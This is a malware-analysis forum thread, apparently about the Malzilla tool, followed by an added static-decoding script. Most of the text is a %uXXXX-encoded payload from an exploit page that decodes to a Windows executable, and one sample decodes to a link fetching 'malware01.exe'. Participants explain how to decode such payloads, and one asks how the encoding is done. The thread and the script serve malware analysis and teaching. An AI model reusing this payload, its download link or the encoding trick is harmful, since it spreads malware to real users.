u0000%u99a4%u0000%u9996%u0000%u9a2c%u0000%u9988%u0000%u9e8a%u0000%u9e7e%u0000%u9e70%u0000
%u9e60%u0000%u9e54%u0000%u9e2c%u0000%u9ae8%u0000%u9afa%u0000%u9b0e%u0000%u9b22%u0000%u9b3e%u0000%u9b5c%u0000%u9b68%u0000%u9b80%u0000%u9b98%u0000%u9ba2%u0000%u9bae%u0000%u9bc0%u0000%u9bd4%u0000%u9be2%u0000%u9bee%u0000%u9bfc%u0000%u9c06%u0000%u9c16%u0000%u9c2c%u0000%u9c38%u0000%u9c48%u0000%u9c62%u0000%u9c7a%u0000%u9c94%u0000%u9caa%u0000%u9cc4%u0000%u9cd6%u0000%u9ce4%u0000%u9cf6%u0000%u9d0e%u0000%u9d1c%u0000%u9d2a%u0000%u9d36%u0000%u9d50%u0000%u9d60%u0000%u9d76%u0000%u9d90%u0000%u9da0%u0000%u9db6%u0000%u9dc6%u0000%u9dd8%u0000%u9dea%u0000%u9e02%u0000%u9e1a%u0000%u0000%u0000%u0039%u8000%u0004%u8000%u000c%u8000%u0073%u8000%u0009%u8000%u0074%u8000%u0010%u8000%u0017%u8000%u0003%u8000%u0034%u8000%u0013%u8000%u0000%u0000%u0105%u7845%u7469%u7250%u636f%u7365%u0073%u0317%u6f4d%u6576%u6946%u656c%u7845%u0041%u0285%u6547%u5774%u6e69%u6f64%u7377%u6944%u6572%u7463%u726f%u4179%u0000%u042b%u6c53%u6565%u0070%u014a%u7246%u6565%u6f43%u736e%u6c6f%u0065%u0095%u7243%u6165%u6574%u7250%u636f%u7365%u4173%u0000%u01e7%u6547%u4c74%u7361%u4574%u7272%u726f%u0000%u0222%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u0000%u02f6%u6f4c%u6461%u694c%u7262%u7261%u4179%u0000%u01f5%u6547%u4d74%u646f%u6c75%u4665%u6c69%u4e65%u6d61%u4165%u0000%u008c%u7243%u6165%u6574%u754d%u6574%u4178%u0000%u02d6%u7349%u6544%u7562%u6767%u7265%u7250%u7365%u6e65%u0074%u037d%u6552%u656c%u7361%u4d65%u7475%u7865%u0000%u027a%u6547%u5674%u7265%u6973%u6e6f%u7845%u0041%u0062%u6f43%u7970%u6946%u656c%u7845%u0041%u454b%u4e52%u4c45%u3233%u642e%u6c6c%u0000%u0277%u6552%u5367%u7465%u6156%u756c%u4565%u4178%u0000%u025a%u6552%u4f67%u6570%u4b6e%u7965%u7845%u0041%u0241%u6552%u4467%u6c65%u7465%u5665%u6c61%u6575%u0041%u022a%u6552%u4367%u6f6c%u6573%u654b%u0079%u4441%u4156%u4950%u3233%u642e%u6c6c%u0000%u5357%u5f32%u3233%u642e%u6c6c%u0000%u0170%u6547%u4374%u6d6f%u616d%u646e%u694c%u656e%u0041%u0437%u6554%u6d72%u6e69%u7461%u5065%u6f72%u6563%u7373%u0000%u01aa%u6547%u4374%u7275%u6572%u746e%u7250%u636f%u7365%u0073%u0448%u6e55%u6168%u646e%u656c%u4564%u6378%u7065%u
6974%u6e6f%u6946%u746c%u7265%u0000%u041f%u6553%u5574%u686e%u6e61%u6c64%u6465%u7845%u6563%u7470%u6f69%u466e%u6c69%u6574%u0072%u015c%u6547%u4374%u4950%u666e%u006f%u02c5%u6e49%u6574%u6c72%u636f%u656b%u4964%u636e%u6572%u656d%u746e%u0000%u02c1%u6e49%u6574%u6c72%u636f%u656b%u4464%u6365%u6572%u656d%u746e%u0000%u0153%u6547%u4174%u5043%u0000%u0214%u6547%u4f74%u4d45%u5043%u0000%u02e0%u7349%u6156%u696c%u4364%u646f%u5065%u6761%u0065%u01fa%u6547%u4d74%u646f%u6c75%u4865%u6e61%u6c64%u5765%u0000%u043e%u6c54%u4773%u7465%u6156%u756c%u0065%u043c%u6c54%u4173%u6c6c%u636f%u0000%u043f%u6c54%u5373%u7465%u6156%u756c%u0065%u043d%u6c54%u4673%u6572%u0065%u03f4%u6553%u4c74%u7361%u4574%u7272%u726f%u0000%u01ae%u6547%u4374%u7275%u6572%u746e%u6854%u6572%u6461%u6449%u0000%u0497%u7257%u7469%u4665%u6c69%u0065%u023e%u6547%u5374%u6474%u6148%u646e%u656c%u0000%u014b%u7246%u6565%u6e45%u6976%u6f72%u6d6e%u6e65%u5374%u7274%u6e69%u7367%u0041%u01c0%u6547%u4574%u766e%u7269%u6e6f%u656d%u746e%u7453%u6972%u676e%u0073%u014c%u7246%u6565%u6e45%u6976%u6f72%u6d6e%u6e65%u5374%u7274%u6e69%u7367%u0057%u0484%u6957%u6564%u6843%u7261%u6f54%u754d%u746c%u4269%u7479%u0065%u01c2%u6547%u4574%u766e%u7269%u6e6f%u656d%u746e%u7453%u6972%u676e%u5773%u0000%u03f0%u6553%u4874%u6e61%u6c64%u4365%u756f%u746e%u0000%u01d8%u6547%u4674%u6c69%u5465%u7079%u0065%u023c%u6547%u5374%u6174%u7472%u7075%u6e49%u6f66%u0041%u00bf%u6544%u656c%u6574%u7243%u7469%u6369%u6c61%u6553%u7463%u6f69%u006e%u02a4%u6548%u7061%u7243%u6165%u6574%u0000%u0461%u6956%u7472%u6175%u466c%u6572%u0065%u02a6%u6548%u7061%u7246%u6565%u0000%u0359%u7551%u7265%u5079%u7265%u6f66%u6d72%u6e61%u6563%u6f43%u6e75%u6574%u0072%u026a%u6547%u5474%u6369%u436b%u756f%u746e%u0000%u01ab%u6547%u4374%u7275%u6572%u746e%u7250%u636f%u7365%u4973%u0064%u0253%u6547%u5374%u7379%u6574%u546d%u6d69%u4165%u4673%u6c69%u5465%u6d69%u0065%u02e6%u434c%u614d%u5370%u7274%u6e69%u4167%u0000%u031f%u754d%u746c%u4269%u7479%u5465%u576f%u6469%u4365%u6168%u0072%u02e8%u434c%u614d%u5370%u7274%u6e69%u5767%u0000%u0240%u6547%u5374%u72
74%u6e69%u5467%u7079%u4165%u0000%u0243%u6547%u5374%u7274%u6e69%u5467%u7079%u5765%u0000%u02f4%u654c%u7661%u4365%u6972%u6974%u6163%u536c%u6365%u6974%u6e6f%u0000%u00da%u6e45%u6574%u4372%u6972%u6974%u6163%u536c%u6365%u6974%u6e6f%u0000%u01e9%u6547%u4c74%u636f%u6c61%u4965%u666e%u416f%u0000%u02ba%u6e49%u7469%u6169%u696c%u657a%u7243%u7469%u6369%u6c61%u6553%u7463%u6f69%u416e%u646e%u7053%u6e69%u6f43%u6e75%u0074%u02a2%u6548%u7061%u6c41%u6f6c%u0063%u045e%u6956%u7472%u6175%u416c%u6c6c%u636f%u0000%u02a9%u6548%u7061%u6552%u6c41%u6f6c%u0063%u039a%u7452%u556c%u776e%u6e69%u0064%u02ab%u6548%u7061%u6953%u657a%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0016%u0000%u0002%u0000%u0002%u0000%u0003%u0000%u0002%u0000%u0004%u0000%u0018%u0000%u0005%u0000%u000d%u0000%u0006%u0000%u0009%u0000%u0007%u0000%u000c%u0000%u0008%u0000%u000c%u0000%u0009%u0000%u000c%u0000%u000a%u0000%u0007%u0000%u000b%u0000%u0008%u0000%u000c%u0000%u0016%u0000
%u000d%u0000%u0016%u0000%u000f%u0000%u0002%u0000%u0010%u0000%u000d%u0000%u0011%u0000%u0012%u0000%u0012%u0000%u0002%u0000%u0021%u0000%u000d%u0000%u0035%u0000%u0002%u0000%u0041%u0000%u000d%u0000%u0043%u0000%u0002%u0000%u0050%u0000%u0011%u0000%u0052%u0000%u000d%u0000%u0053%u0000%u000d%u0000%u0057%u0000%u0016%u0000%u0059%u0000%u000b%u0000%u006c%u0000%u000d%u0000%u006d%u0000%u0020%u0000%u0070%u0000%u001c%u0000%u0072%u0000%u0009%u0000%u0006%u0000%u0016%u0000%u0080%u0000%u000a%u0000%u0081%u0000%u000a%u0000%u0082%u0000%u0009%u0000%u0083%u0000%u0016%u0000%u0084%u0000%u000d%u0000%u0091%u0000%u0029%u0000%u009e%u0000%u000d%u0000%u00a1%u0000%u0002%u0000%u00a4%u0000%u000b%u0000%u00a7%u0000%u000d%u0000%u00b7%u0000%u0011%u0000%u00ce%u0000%u0002%u0000%u00d7%u0000%u000b%u0000%u0718%u0000%u000c%u0000%u000c%u0000%u0008%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u0000%u0000%u0000%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6261%u6463%u6665%u6867%u6a69%u6c6b%u6e6d%u706f%u7271%u7473%u7675%u7877%u7a79%u0000%u0000%u0000%u4241%u4443%u
4645%u4847%u4a49%u4c4b%u4e4d%u504f%u5251%u5453%u5655%u5857%u5a59%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u0000%u0000%u0000%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6100%u6362%u6564%u6766%u6968%u6b6a%u6d6c%u6f6e%u7170%u7372%u7574%u7776%u7978%u007a%u0000%u0000%u4100%u4342%u4544%u4746%u4948%u4b4a%u4d4c%u4f4e%u5150%u5352%u5554%u5756%u5958%u005a%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u00
00%u0000%u0000%u0000%u0000%u0000%ua180%u0040%u0201%u0804%u03a4%u0000%u8260%u8279%u0021%u0000%u0000%u0000%udfa6%u0000%u0000%u0000%ua5a1%u0000%u0000%u0000%u9f81%ufce0%u0000%u0000%u7e40%ufc80%u0000%u0000%u03a8%u0000%ua3c1%ua3da%u0020%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%ufe81%u0000%u0000%u0000%ufe40%u0000%u0000%u0000%u03b5%u0000%ua3c1%ua3da%u0020%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%ufe81%u0000%u0000%u0000%ufe41%u0000%u0000%u0000%u03b6%u0000%ua2cf%ua2e4%u001a%ua2e5%ua2e8%u005b%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%ufe81%u0000%u0000%u0000%u7e40%ufea1%u0000%u0000%u0551%u0000%uda51%uda5e%u0020%uda5f%uda6a%u0032%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%ud381%uded8%uf9e0%u0000%u7e31%ufe81%u0000%u0000%u8bdc%u0040%ufffe%uffff%u0043%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%ua6a8%u0040%u0000%u0000%u0000%u0000%u0000%u0000%ua6a8%u0040%u0000%u0000%u0000%u0000%u0000%u0000%ua6a8%u0040%u0000%u0000%u0000%u0000%u0000%u0000%ua6a8%u0040%u0000%u0000%u0000%u0000%u0000%u0000%ua6a8%u0040%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u0000%u0000%uaaa8%u0040%u0000%u0000%u0000%u0000%u89d8%u0040%u8e60%u0040%u8fe0%u0040%ua9e8%u0040%ua6b0%u0040%u0001%u0000%ua6b0%u0040%ua180%u0040%uffff%uffff%uffff%uffff%u362e%u0040%u0000%u0000%u0002%u0000%u87c0%u0040%u0008%u0000%u8794%u0040%u0009%u0000%u8768%u0040%u000a%u0000%u86d0%u0040%u0010%u0000%u86a4%u0040%u0011%u0000%u8674%u0040%u0012%u0000%u8650%u0040%u0013%u0000%u8624%u0040%u0018%u0000%u85ec%u0040%u0019%u0000%u85c4%u0040%u001a%u0000%u858c%u0040%u001b%u0000%u8554%u0040%u001c%u0000%u852c%u0040%u001e%u0000%u850c%u0040%u001f%u0000%u84a8%u0040%u0020%u0000%u8470%u0040%u0021%u0000%u8378%u0040%u0022%u0000%u82d8%u0040
%u0078%u0000%u82c4%u0040%u0079%u0000%u82b4%u0040%u007a%u0000%u82a4%u0040%u00fc%u0000%u82a0%u0040%u00ff%u0000%u8290%u0040%u0003%u0000%u0007%u0000%u0078%u0000%u000a%u0000%uffff%uffff%u0a80%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0010%u0000%ue64e%ubb40%u19b1%u44bf%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u89d8%u0040%u8bda%u0040%u9208%u0040%u9204%u0040%u9200%u0040%u91fc%u0040%u91f8%u0040%u91f4%u0040%u91f0%u0040%u91e8%u0040%u91e0%u0040%u91d8%u0040%u91cc%u0040%u91c0%u0040%u91b8%u0040%u91ac%u0040%u91a8%u0040%u91a4%u0040%u91a0%u0040%u919c%u0040%u9198%u0040%u9194%u0040%u9190%u0040%u918c%u0040%u9188%u0040%u9184%u0040%u9180%u0040%u917c%u0040%u9174%u0040%u9168%u0040%u9160%u0040%u9158%u0040%u9198%u0040%u9150%u0040%u9148%u0040%u9140%u0040%u9134%u0040%u912c%u0040%u9120%u0040%u9114%u0040%u9110%u0040%u910c%u0040%u9100%u0040%u90ec%u0040%u90e0%u0040%u0409%u0000%u0001%u0000%u0000%u0000%ua9e8%u0040%u002e%u0000%uaaa4%u0040%ub27c%u0040%ub27c%u0040%ub27c%u0040%ub27c%u0040%ub27c%u0040%ub27c%u0040%ub27c%u0040%ub27c%u0040%ub27c%u0040%u7f7f%u
7f7f%u7f7f%u7f7f%uaaa8%u0040%u0001%u0000%u002e%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u7577%u0040%u7577%u0040%u7577%u0040%u7577%u0040%u7577%u0040%u7577%u0040%u7577%u0040%u7577%u0040%u7577%u0040%u7577%u0040%u0000%u0000%u0000%u0000%u7080%u0000%u0001%u0000%uf1f0%uffff%u0000%u0000%u5350%u0054%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u4450%u0054%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%uab30%u0040%uab70%u0040%uffff%uffff%u0000%u0000%u0000%u0000%uffff%uffff%u0000%u0000%u0000%u0000%u0003%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0520%u1993%u0000%u0000%u0000%u0000%u0000%u0000%uffff%uffff%u001e%u0000%u003b%u0000%u005a%u0000%u0078%u0000%u0097%u0000%u00b5%u0000%u00d4%u0000%u00f3%u0000%u0111%u0000%u0130%u0000%u014e%u0000%u016d%u0000%uffff%uffff%u001e%u0000%u003a%u0000%u0059%u0000%u0077%u0000%u0096%u0000%u00b4%u0000%u00d3%u0000%u00f2%u0000%u0110%u0000%u012f%u0000%u014d%u0000%u016c%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u00
00%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0004%u0000%u0000%u0001%u0018%u0000%u0018%u8000%u0000%u0000%u0000%u0000%u0004%u0000%u0000%u0001%u0001%u0000%u0030%u8000%u0000%u0000%u0000%u0000%u0004%u0000%u0000%u0001%u0409%u0000%u0048%u0000%uc058%u0000%u015a%u0000%u04e4%u0000%u0000%u0000%u613c%u7373%u6d65%u6c62%u2079%u6d78%u6e6c%u3d73%u7522%u6e72%u733a%u6863%u6d65%u7361%u6d2d%u6369%u6f72%u6f73%u7466%u632d%u6d6f%u613a%u6d73%u762e%u2231%u6d20%u6e61%u6669%u7365%u5674%u7265%u6973%u6e6f%u223d%u2e31%u2230%u0d3e%u200a%u3c20%u7274%u7375%u4974%u666e%u206f%u6d78%u6e6c%u3d73%u7522%u6e72%u733a%u6863%u6d65%u7361%u6d2d%u6369%u6f72%u6f73%u7466%u632d%u6d6f%u613a%u6d73%u762e%u2233%u0d3e%u200a%u2020%u3c20%u6573%u7563%u6972%u7974%u0d3e%u200a%u2020%u2020%u3c20%u6572%u7571%u7365%u6574%u5064%u6972%u6976%u656c%u6567%u3e73%u0a0d%u2020%u2020%u2020%u2020%u723c%u7165%u6575%u7473%u6465%u7845%u6365%u7475%u6f69%u4c6e%u7665%u6c65%u6c20%u7665%u6c65%u223d%u7361%u6e49%u6f76%u656b%u2272%u7520%u4169%u6363%u7365%u3d73%u6622%u6c61%u6573%u3e22%u2f3c%u6572%u7571%u7365%u6574%u4564%u6578%u7563%u6974%u6e6f%u654c%u6576%u3e6c%u0a0d%u2020%u2020%u2020%u2f3c%u6572%u7571%u7365%u6574%u5064%u6972%u6976%u656c%u6567%u3e73%u0a0d%u2020%u2020%u2f3c%u6573%u7563%u6972%u7974%u0d3e%u200a%u3c20%u742f%u7572%u7473%u6e49%u6f66%u0d3e%u3c0a%u612f%u7373%u6d65%u6c62%u3e79%u4150%u4150%u4444%u4e49%u5847%u5058%u4441%u4944%u474e%u4150%u4444%u4e49%u5847%u5058%u4441%u4944%u474e%u4150%u4444%u4e49%u5847%u5058%u4441%u4944%u474e%u4150%u4444%u4e49%u5847%u5058%u4441%u4944%u474e%u4150%u4444%u4e49%u5847%u5058%u4441");
But when I paste this code into the Misc Decoders tab and try the Decode UCS2 button, Malzilla could not decode this script (the Concatenate button is similar). So, I need your help to decode this script.
Thanks for your useful Malzilla!
-
Hi denmilu,
remove var payload = unescape(" at the beginning of the script and "); at the end of script.
Click on "UCS2 to Hex" and on "Hex to bin" after that.
You will get plain EXE file.
-
Hi Bobby,
Thanks for your help, but in my Malzilla 1.2.0 I did not find the "Hex to bin" button.
Because I did not find the "Hex to bin" button, I clicked on "Hex to File", and after that I got a filename.bin, and I could not read the content inside. :(
So do you have any suggestion for what I should do now? I want to find the link in this decoded script.
I have just begun using Malzilla, so at first I think I will have many problems; I hope you can help me get past this.
Thank you!
-
I think here is a simple encoded script, similar to the one above,
JWXNcwDTisuUZviJAX+=unescape("%u7468%u7074%u2F3A%u652F%u7078%u6F6C%u7469%u612E%u6470%u6972%u6C6C%u612E%u6973%u2F61%u616D%u776C%u7261%u3065%u2E31%u7865%u0065");
And when I did as you instructed, I got the link
http://exploit.apdrill.asia/malware01.exe
but with the link above, I cannot read the content of the Bin file.
I also attach a txt file that contains the encoded content, but I could not decode it to view the plain content inside; can you tell me how to decode it?
-
Remove EVERYTHING except the UCS code, and then click UCS2 To Hex, then copy it and paste it into the Hex decoder tab ;) (it's got an MZ header at the top indicating it's an actual executable btw)
-
Should've looked at the next page before replying, hehe.
It's Hex to File btw, not Hex to Bin ;) (on the Misc Decoders tab)
-
So do you have any suggestion for what I should do now? I want to find the link in this decoded script.
You can load the .bin in either the Hex Decoder tab, or download and install FileInsight ;)
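The "UCS2 to Hex" and "Hex to File" steps discussed in the replies above can also be reproduced statically outside Malzilla. This is an added example, not part of the original thread and not Malzilla's code: it turns %uXXXX escapes into little-endian bytes, checks for the MZ header and lists any URLs in defanged form. The function names and the second, constructed sample are assumptions.

```javascript
// Added example: static triage of a %uXXXX ("UCS2") escaped payload.
// The input is parsed as data only; nothing is evaluated, written or fetched.

// Short sample quoted in the thread above.
const THREAD_SAMPLE =
  '%u7468%u7074%u2F3A%u652F%u7078%u6F6C%u7469%u612E%u6470%u6972%u6C6C' +
  '%u612E%u6973%u2F61%u616D%u776C%u7261%u3065%u2E31%u7865%u0065';

// Constructed sample: the first bytes of a typical DOS header, still inside its
// JavaScript wrapper and with a line break in the middle of an escape, as
// happens when a long payload is pasted from a forum or mail.
const CONSTRUCTED_WRAPPED =
  'var payload = unescape("%u5a4d%u00\n90%u0003%u0000");';

// "UCS2 to Hex": each %uXXXX is one UTF-16 code unit. In memory it is stored
// low byte first, so %u7468 becomes 0x68 0x74 ("ht"), not "th".
// Wrapper text around the escapes is ignored because only %uXXXX is matched.
function ucs2EscapesToBytes(text) {
  const compact = text.replace(/\s+/g, ''); // rejoin escapes split by line wraps
  const bytes = [];
  for (const m of compact.matchAll(/%u([0-9a-fA-F]{4})/g)) {
    const unit = parseInt(m[1], 16);
    bytes.push(unit & 0xff, unit >> 8);
  }
  return Buffer.from(bytes);
}

// An executable starts with the two bytes "MZ" (0x4d 0x5a).
function hasMzHeader(buf) {
  return buf.length >= 2 && buf[0] === 0x4d && buf[1] === 0x5a;
}

// Runs of printable ASCII, like the `strings` utility.
function printableStrings(buf, minLen = 6) {
  const out = [];
  let run = '';
  for (const b of buf) {
    if (b >= 0x20 && b <= 0x7e) {
      run += String.fromCharCode(b);
    } else {
      if (run.length >= minLen) out.push(run);
      run = '';
    }
  }
  if (run.length >= minLen) out.push(run);
  return out;
}

// Rewrite a URL so that it cannot be clicked or auto-linked in a report.
function defang(url) {
  const m = /^(https?):\/\/([^\/]+)(.*)$/i.exec(url);
  if (!m) return url;
  return m[1].replace(/^http/i, 'hxxp') + '://' + m[2].replace(/\./g, '[.]') + m[3];
}

// Decode, classify and pull out URLs in one pass.
function triageUcs2Payload(text) {
  const buf = ucs2EscapesToBytes(text);
  const urls = [];
  for (const s of printableStrings(buf)) {
    for (const u of s.match(/https?:\/\/[\x21-\x7e]+/gi) || []) urls.push(defang(u));
  }
  return {
    size: buf.length,
    hexPrefix: buf.subarray(0, 8).toString('hex'),
    isExecutable: hasMzHeader(buf),
    urls,
  };
}

console.log(triageUcs2Payload(THREAD_SAMPLE));
console.log(triageUcs2Payload(CONSTRUCTED_WRAPPED));
```

When `isExecutable` is true, the decoded bytes are a binary to hand to a hex viewer or disassembler, which is why the saved .bin is not readable as text.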
-
Hi MysteryFCM,
Thanks for your help!
Now I have understood the method to decode this type (%uxxxx) of script, but I wonder how we could encode a link to UCS code? Do we have any tool to help us do that?
For example, we have a link http://www.malwaredomainlist.com
So how can we encode it to a UCS code?
-
Why would you want to?
-
Hi MysteryFCM,
Because I'm preparing for a lecture, I need to understand all the technology that is used in malicious code. The main purpose is analysing malware, but before analysis, we need to know how it gets that way (how to encode).
So I need your help! Thanks
-
If it's for a lecture, I'll let you do the work and just give you a pointer ;)
http://php.net/manual/en/function.iconv.php
